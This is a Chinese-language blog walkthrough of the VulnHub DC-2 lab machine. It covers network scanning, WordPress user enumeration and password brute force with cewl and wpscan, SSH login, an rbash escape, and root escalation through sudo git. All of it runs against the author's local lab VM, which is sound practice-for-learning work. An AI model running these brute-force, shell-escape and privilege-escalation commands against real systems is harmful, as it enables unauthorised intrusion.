环境搭建
VMware和Kali Linux的环境搭建
VMware和Kali Linux的环境搭建我在这里就不说了,具体各种参考我这篇博客
DC-2靶机的搭建
老样子,直接打开这个链接,浏览器就会自动下载DC-2压缩包了
https://download.vulnhub.com/dc/DC-2.zip
这里的具体安装教程就不多说了,可以参考上篇博客
渗透教程
tips:启动的时候可能会显示
无法连接ide:0
,直接点是
就行了
接下来开始渗透
收集信息
首先打开命令行,查看kali的ip地址
ip a
我的本机ip是192.168.3.42
,然后进行网段扫描
netdiscover -r 192.168.3.0/24#这边的ip是你的ip最后变成0/24
Currently scanning: Finished! | Screen View: Unique Hosts
7 Captured ARP Req/Rep packets, from 5 hosts. Total size: 420
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
************ ***************** 3 180 HUAWEI TECHNOLOGIES CO.,LTD
************ ***************** 1 60 Shenzhen JMicron Intelligent Technology Developmen
************ ***************** 1 60 Luxshare Precision Industry Co., Ltd
192.168.3.46 00:0c:29:41:db:6d 1 60 VMware, Inc.
************ ***************** 1 60 Unknown vendor
zsh: suspended sudo netdiscover -r 192.168.3.0/24
可以看到,目标靶机DC-2的ip是192.168.3.46
接下来进行nmap
探测
nmap 192.168.3.46 -p- -A
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-21 06:30 EST
Nmap scan report for dc-2 (192.168.3.46)
Host is up (0.00056s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-title: DC-2 – Just another WordPress site
|_http-generator: WordPress 4.7.10
|_http-server-header: Apache/2.4.10 (Debian)
7744/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0)
| ssh-hostkey:
| 1024 52:51:7b:6e:70:a4:33:7a:d2:4b:e1:0b:5a:0f:9e:d7 (DSA)
| 2048 59:11:d8:af:38:51:8f:41:a7:44:b3:28:03:80:99:42 (RSA)
| 256 df:18:1d:74:26:ce:c1:4f:6f:2f:c1:26:54:31:51:91 (ECDSA)
|_ 256 d9:38:5f:99:7c:0d:64:7e:1d:46:f6:e9:7c:c6:37:17 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.29 seconds
可以看到,目标开放了80网页端口
、7744ssh端口
,先访问一下80
端口
flag1
网页无法被访问,那么我们就要考虑重定向
了,也就是说,我们需要更改hosts文件
Windows下的hosts文件位置:C:\Windows\System32\drivers\etc\hosts
Linux下的hosts文件位置:/etc/hosts
为了方便后续渗透,我在Kali中修改
sudo vim /etc/hosts
然后我们按下i
键,左下角会显示一个[插入]
,然后输入以下内容
192.168.3.46 dc-2 ip是靶机的ip
然后我们按esc
键,再直接输入:wq
,就可以了,然后刷新一下网页,是WordPress
然后直接查看flag1
翻译过来就是:你常用的单词表可能不管用了,所以,或许你只需要很酷(cewl)。密码越多越好,但有时候你可能无法赢得全部。以一个用户身份登录以查看下一个标志。如果你找不到它,就尝试以另一个用户身份登录。
没大看懂,但是有cewl关键词,这是一个字典生成工具
但是我们要找到登录界面
开始渗透
flag3
用nikto进行探测
扫描出来后,不难发现,下面有一个WordPress的登录界面的网址
+ /wp-login.php: Wordpress login found.
直接访问
成功!然后就可以进行字典生成了
cewl http://dc-2 -w ./passwords.txt #passwords.txt名称自订
有了密码,还需要账户,这就需要用到WPScan
接下来枚举用户名
wpscan --url http://dc-2 -e u
成功爆出用户名,给它写到一个文件里面
touch ./users.txt
vim ./users.txt
#users.txt文件名自定
然后按照更改hosts文件的方法,将用户名写到里面
admin
jerry
tom
然后用wpscan进行爆破
wpscan --url http://dc-2 -U ./users.txt -P ./passwords.txt
然后就等待爆用户和密码
然后尝试登录
在jerry中发现了flag2
翻译过来就是:如果你无法利用WordPress找到捷径,还有另一种方法。希望你能找到另一个切入点。
这flag还不如没有
flag3
直接尝试ssh登录
ssh jerry@192.168.3.46 -p 7744#192.168.3.46是靶机ip
ssh tom@192.168.3.46 -p 7744#192.168.3.46是靶机ip
因为dc-2不是默认的22ssh端口,所以最后要加上-p 7744
,代表ssh端口是7744
jerry没法登,tom可以
tom@DC-2:~$ ls
tom@DC-2:~$ cat flag3.txt
发现有rbash限制
但是可以用vi
啊[doge]
vi ./flag3.txt
良心的Kimi啊,直接提示了su
命令,可能有限制,但先试试
su jerry
果然,那就要上rbash逃逸了
flag4
BASH_CMDS[r]=/bin/bash #设置一个变量为r
r #执行这个变量
然后设置环境变量
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin/
成功!
直接查看flag4
翻译一下
真文明,还配个笑脸 :) 咋感觉有点眼熟
咳咳,扯远了
final-flag
flag中有一个提示词git
,那么应该就是git
提权,看下git是不是SUID命令
sudo -l
可以看到有git
,直接提权
sudo git help config
然后输入!/bin/bash
然后
cd ~
ls
cat final-flag.txt